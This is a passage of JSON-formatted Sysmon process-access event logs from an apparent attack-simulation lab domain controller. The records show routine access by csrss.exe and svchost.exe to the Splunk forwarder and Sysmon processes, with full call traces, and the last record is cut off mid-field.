{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C0-5F25-0000-0010A58F0600}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C0-5F25-0000-0010A58F0600}","TargetProcessId":"5032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 